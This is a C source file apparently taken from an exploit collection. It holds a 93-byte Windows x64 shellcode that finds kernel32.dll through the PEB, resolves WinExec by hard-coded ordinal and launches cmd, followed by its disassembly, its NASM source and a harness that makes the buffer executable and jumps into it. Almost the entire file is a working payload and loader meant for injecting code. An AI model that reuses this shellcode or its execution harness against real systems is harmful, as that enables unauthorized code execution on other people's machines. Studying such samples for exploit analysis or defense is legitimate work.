/*
# Title : Windows x64 WinExec() shellcode
# Date : 15-10-2016
# Author : Roziul Hasan Khan Shifat
# size : 93 bytes
# Tested on : Windows 7 Ultimate x64
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 99 cltd
1: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
6: 48 8b 40 18 mov 0x18(%rax),%rax
a: 48 8b 70 10 mov 0x10(%rax),%rsi
e: 48 ad lods %ds:(%rsi),%rax
10: 48 8b 30 mov (%rax),%rsi
13: 48 8b 7e 30 mov 0x30(%rsi),%rdi
17: 48 31 db xor %rbx,%rbx
1a: 48 31 f6 xor %rsi,%rsi
1d: 8b 5f 3c mov 0x3c(%rdi),%ebx
20: 48 01 fb add %rdi,%rbx
23: b2 88 mov $0x88,%dl
25: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
28: 48 01 fb add %rdi,%rbx
2b: 8b 73 1c mov 0x1c(%rbx),%esi
2e: 48 01 fe add %rdi,%rsi
31: 99 cltd
32: 66 ba 27 05 mov $0x527,%dx
36: 8b 04 96 mov (%rsi,%rdx,4),%eax
39: 48 01 f8 add %rdi,%rax
3c: eb 17 jmp 55 <c>
000000000000003e <exec>:
3e: 59 pop %rcx
3f: 99 cltd
40: 48 ff c2 inc %rdx
43: ff d0 callq *%rax
45: 99 cltd
46: 66 ba 29 01 mov $0x129,%dx
4a: 8b 04 96 mov (%rsi,%rdx,4),%eax
4d: 48 01 f8 add %rdi,%rax
50: 48 31 c9 xor %rcx,%rcx
53: ff d0 callq *%rax
0000000000000055 <c>:
55: e8 e4 ff ff ff callq 3e <exec>
5a: 63 6d 64 movslq 0x64(%rbp),%ebp
...
*/
/*
bits 64
section .text
global _start
_start:
cdq
mov rax,[gs:rdx+0x60] ;PEB
mov rax,[rax+0x18] ;PEB.Ldr
mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
xor rbx,rbx
xor rsi,rsi
mov ebx,[rdi+0x3c] ;e_lfanew
add rbx,rdi ;PE HEADER
mov dl,0x88
mov ebx,[rbx+rdx] ;DataDirectory->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY
mov esi,[rbx+0x1c] ;AddressOfFunctions
add rsi,rdi
cdq
mov dx,1319 ;Ordinal of WinExec()
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=WinExec()
;WinExec("cmd",1)
jmp c
exec:
pop rcx
cdq
inc rdx
call rax
cdq
mov dx,297
mov eax,[rsi+rdx*4]
add rax,rdi ;rax=FatalExit()
;FatalExit(0)
xor rcx,rcx
call rax
c:
call exec
db 'cmd',0,0
*/
#include<stdio.h>
#include<string.h>
#include<windows.h>
/* The 93 payload bytes listed in the disassembly above (offsets 0x00..0x5c).
 * None of them is 0x00, so strlen() in main() measures the whole buffer, and
 * the literal's implicit terminating NUL stands in for the `db 'cmd',0,0`
 * padding of the NASM source and terminates the "cmd" argument passed to
 * WinExec(). The AddressOfFunctions indexes 0x527 (1319, WinExec) and 0x129
 * (297, FatalExit) are hard-coded for the kernel32.dll build the author tested
 * (Windows 7 Ultimate x64); on another build they presumably resolve to
 * different exports, so the sample is not expected to run elsewhere. */
char shellcode[]="\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x48\x31\xdb\x48\x31\xf6\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x66\xba\x27\x05\x8b\x04\x96\x48\x01\xf8\xeb\x17\x59\x99\x48\xff\xc2\xff\xd0\x99\x66\xba\x29\x01\x8b\x04\x96\x48\x01\xf8\x48\x31\xc9\xff\xd0\xe8\xe4\xff\xff\xff\x63\x6d\x64";
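/*
 * Test harness: makes the in-process `shellcode` buffer executable and
 * transfers control to it. Per the NASM source above the payload calls
 * WinExec("cmd",1) and then FatalExit(0), so on the tested build control
 * normally does not come back here.
 *
 * Returns 1 when VirtualProtect() refuses the protection change (nothing is
 * executed in that case), 0 if the payload ever returns.
 */
int main(void)
{
    /* Use the literal's size rather than strlen(): the current bytes contain
     * no 0x00, but a zero byte anywhere in the payload would otherwise make
     * strlen() silently undercount the length. */
    size_t len = sizeof(shellcode) - 1;
    DWORD old_protect = 0;

    printf("shellcode length %u bytes\n", (unsigned)len);

    /* `shellcode` is a writable data array; it has to be made executable
     * before the indirect call. The original ignored the return value, so a
     * refused change showed up only as a fault on the call below. */
    if (!VirtualProtect(shellcode, len, PAGE_EXECUTE_READWRITE, &old_protect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    ((void (*)(void)) shellcode)();
    return 0;
}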